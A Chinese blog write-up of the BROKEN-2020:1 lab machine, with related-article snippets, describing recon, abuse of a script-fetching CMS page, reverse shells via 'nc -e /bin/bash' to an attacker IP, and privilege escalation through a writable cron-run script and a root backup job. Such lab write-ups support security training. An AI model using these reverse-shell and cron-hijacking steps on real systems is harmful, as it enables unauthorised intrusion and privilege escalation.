BROKEN-2020: 1靶机

最新推荐文章于 2024-08-12 00:14:51 发布
最新推荐文章于 2024-08-12 00:14:51 发布
阅读量368 收藏 1
点赞数 1
分类专栏: 靶机 文章标签: linux shell
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_48985780/article/details/118416498
版权

BROKEN-2020: 1靶机

arp-scan -l 扫描靶机IP地址

nmap -sV -Pn -A x.x.x.204 扫描端口

访问80端口

扫描目录

查看cms目录

安装,发现第一个flag

扫描cms目录

可以看到多了一个/cms/cc/目录,随便填个地址和端口看看,网页说没有拿到脚本

那么我们看一下他到底是拿什么脚本,本地开启一个服务器,然后再用/cms/cc/页面的功能访问我们本地开启服务器

对方的/cms/cc/网页请求了一个xx.sh的脚本,那本地新建一个脚本,看会不会运行。

其实xx.sh脚本里也可以直接写nc -e /bin/bash 10.0.2.4 4444都是差不多的
本地用nc开启一个监听,然后/cms/cc上请求我们本地的服务器

拿到flag

可以成功拿到shell。
这里有个小问题,就是弹回来的shell可能会出问题,就是那种你输入一个字符,他出现两个字符,遇到这种情况也没关系,利用当前的shell再反弹一个shell就好了
nc -e /bin/bash/ 10.0.2.4 5555
python -c "import pty;pty.spawn('/bin/bash')"
我们进入到/home/alice/flag.txt 拿到flag2
然后/home/alice/note.txt 说会定时运行log.py 清理clear.log,而/home/alice是可读可写的那么我们替换log.py

再本地开启http服务,利用wget把我们写好的log.py 传到对方服务器上,然后设置可执行权限

再本地开启nc监听,等待对方服务器连接

在这个alice权限的shell中找到第三个flag /home/alice/backup/flag.txt 当然这个文件也存在与/back/backup/flag.txt
然后根据/home/alice/backup/note.txt 提示说,root权限的脚本会去把path.txt 里面的路径同步到/home/alice/backup/

那么把/root写到/home/alice/backup/path.txt中,等待一分钟/root文件夹就被同步过来了

xzhome
关注
专栏目录
初识靶机_Broken——渗透day05
qq_62716256的博客
08-12 1011
初识靶机_Broken——渗透day05
渗透测试 ( 2 ) --- 渗透测试系统、靶机、GoogleHacking、kali工具
墨鱼菜鸡
07-11 2424
操作系统:https://zhuanlan.zhihu.com/p/162865015 1、基于 Windows、Linux、Android 的渗透测试系统 1.1 基于 Linux 的系统 Kali:https://www.kali.org/get-kali/Parrot Security OS:Parrot Securitybackbox:ht...
broken靶机(计划任务提权)
m0_66299232的博客
11-27 446
9.虽然可以利用,但是他这个脚本只能看,不能改,然而之前的script文件夹可是满权限,那么就可以让这个log.py文件改名,让我们自己写的脚本变为log.py。5.这个root下面也有一个backup.py 应该是一样的脚本,根据前面的脚本信息,把/root写入path.txt就能把root目录给复制一份。3.查看path.txt啥也没有,退到根目录下(/和~不是一个目录)查看到一个backup.py的脚本。5.反弹成功之后,查看家目录下的alice用户,发现script目录是一个满权限的文件夹。
broken靶机
最新发布
weixin_71232352的博客
08-12 445
broken靶机
broken 靶机 wp
m0_52496313的博客
10-14 173
broken 靶机 wp
vulnhub | BROKEN-2020: 1
水榭山寺花烂漫,凤凰集外雁归来。敢与云峰争秀色,妙雨莲花九重开。
09-07 524
文章目录总结前言开始 总结 - 0. arp 扫描 | netdiscover -i eth0 | arp-scan --interface=eth0 --localnet - 0.1 查看定时任务 | cat /etc/crontab - 1. python 开启一个http服务器 | python3 -m http.server 8080 - 2. nc 开启监听 | nc -lvp 4444 - 3. nc 反弹shell | nc -e /bin/bash 10.0.2.4 4444 -
Kali Linux Web渗透测试手册(第二版) - 1.3 - 靶机的安装
weixin_30340617的博客
06-22 620
Kali Linux Web渗透测试手册(第二版) - 1.3 - 靶机的安装 一.配置KALI Linux和渗透测试环境 在这一章,我们将覆盖以下内容: 在Windows和Linux上安装VirtualBox 创建一个Kali Linux虚拟机 更新和升级Kali Linux 为渗透测试配置web浏览器(即在Firefox浏览器下安装一些常用的插件) 创建一个属于...
靶机全家桶的安装
m0_51902711的博客
04-12 532
靶机全家桶——OWASP Broken Web Application安装教程 (一)介绍 OWASP是一个集成在虚拟机中的靶机漏洞环境集合,里面包含: 不同开发语言靶机环境(可以练习不同语言开发的靶机环境) 自动化测试工具 测试源码分析工具 观察网络攻击 测试waf类技术 脆弱的web仿真环境 (二)下载 2.1点击以下链接,根据实际情况下载。(我这里下载的是2015版本的1.2) https://sourceforge.net/projects/owaspbwa/fi
【实战模拟】下载安装并配置虚拟kali Linux 和 OWASP Broken Web Apps 靶机
热门推荐
₰₯₮ 的博客
12-24 8万+
1、下载安装虚拟机 两种下载虚拟机的方法,一个是华军软件园,来一个是网盘分享的(别用高速下载) ​​​​​​​华军软件园 下载安装虚拟机链接直达 提取码:7bjx 虚拟机下载链接 需要激活码的私信我哈 安装过的就直接跳过看下面,安装虚拟机的步骤就不详细介绍了,直接安装即可。 2、下载Kali Linux虚拟机文件 觉得用什么下载快选哪个 网盘链接:提取码:7sry 网盘Kali链接下载 官网链接:Kali官网链接平台下载 下载完后 打开虚拟机,把刚刚下载好的文件解压一下,然后双击.
vulhub-Broken-2020:1
2201_75378806的博客
05-13 364
成功后,看到一个backup(备份)文件夹查看note.txt,大概就是告诉alice网站被黑客攻击了,让它备份到path.txt.查看path.txt啥也没有,退到根目录下(/和~不是一个目录)查看到一个backup.py的脚本没有可利用的了 ,上传本地脚本pspy64(github里有)发现一个进程,是root执行的进程。由于脚本 log.py 是以 alice 身份运行的,如果我们设法在 log.py 中插入反向 shellcode,我们就可以获得 Alice 的帐户访问权限。
OWASP Mutillidae 靶机实验指导书
06-08
该指导书对每个页面存在漏洞进行了详细分类,对OWASP Top 10 应用安全风险-2017中的漏洞举例说明,结合靶机使用还不错。
OWASP测试指南(中文) v3.0
11-26
OWASP测试指南(中文) v3.0 可编辑和搜索 带目录 搜索资源的时候没有发现v4.0版本 搜索到的全部都是v3.0版本写作v4.0版本
Linux Labs 1
weixin_46601305的博客
01-14 690
BUUCTF 靶场 Linux Labs 1
如何部署OWASP靶机
xiaojiadong2019的博客
10-18 557
4.下图中的网络适配器选择NAT模式,如果NAT模式不能登录请切换到桥接模式(不建议使用桥接模式)7.使用默认用户名与密码登录 admin/admin。5.开启虚拟机,使用如下用户名和密码登录。(具体以自己虚拟机内IP地址为准)1.OWASP下载后解压到本地。6.登录DVWP系统界面。
BUUCTF:Linux Labs
weixin_49186466的博客
08-05 5315
根据题目所示,在虚拟机中访问 ssh -p 29719 root@node4.buujo.cn -p 后接指定端口 root为用户名 @后接地址 注意:地址和端口为动态分配,根据自己题目给出 输yes,后输入题目给出密码,查看,得到flag flag{aacb1293-f6a6-49ef-982f-e298df60c515} ...
在kali上使用virtualBox搭建OWASPbwa靶机
jelly
02-20 3180
前言 最近学习使用kali系统,在电脑上安装kali+windows10的双系统,在学习了一些常规漏洞后,打算在kali系统中利用virtualBox搭建一个靶机,用于实战练习。 #使用环境 宿主主机:kali linux2019.11 使用软件:virtualbox 6.1.2_Debian r135662 靶机:OWASPbwa2.0 具体步骤 1.安装virtualbox 在 /etc/ap...
OWASP_VM_1.2靶机的下载、安装及连接访问
ZJLE的博客
08-05 3921
OWASP_VM_1.2靶机的下载、安装及连接访问OWASP_VM_1.2下载OWASP_VM_1.2安装靶机访问不上的问题解决方法 刚刚入门的新手白白们都需要一个可以用来练习的环境,但是dvwa的搭建需要相关环境,所以这里推荐大家在虚拟机上搭建owasp靶机,里面集成了dvwa靶机。 OWASP(Broken Web Applications Project),是一组易受攻击的Open Web应用程序安全项目,分布在VMware格式的虚拟机上,包含了当前几乎全部类型的漏洞,例如:SQL注入、XSS攻击等等
OWASP靶机安装
qq_43681802的博客
02-02 5843
渗透测试靶机系列–(webgoat安装) 文章目录渗透测试靶机系列--(webgoat安装)前言一、WEBGOAT是什么?二、安装步骤1.下载OWASP和vmware2.使用OWASP总结 前言 一、WEBGOAT是什么? WebGoat是OWASP组织研制出的用于进行web漏洞实验的Java靶场程序,用来说明web应用中存在的安全漏洞。WebGoat运行在带有java虚拟机的平台之上,当前提供的训练课程有30多个,其中包括:跨站点脚本攻击(XSS)、访问控制、线程安全、操作隐藏字段、操纵参
vulnhub靶机-jangow: 1.0.1
03-16
vulnhub靶机-jangow: 1..1是一款用于渗透测试和漏洞攻击的虚拟机。它基于Ubuntu操作系统,包含多个漏洞和弱点,供安全专业人员进行测试和实践。该靶机的目标是获取root权限,并且需要使用各种技术和工具来完成任务。...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值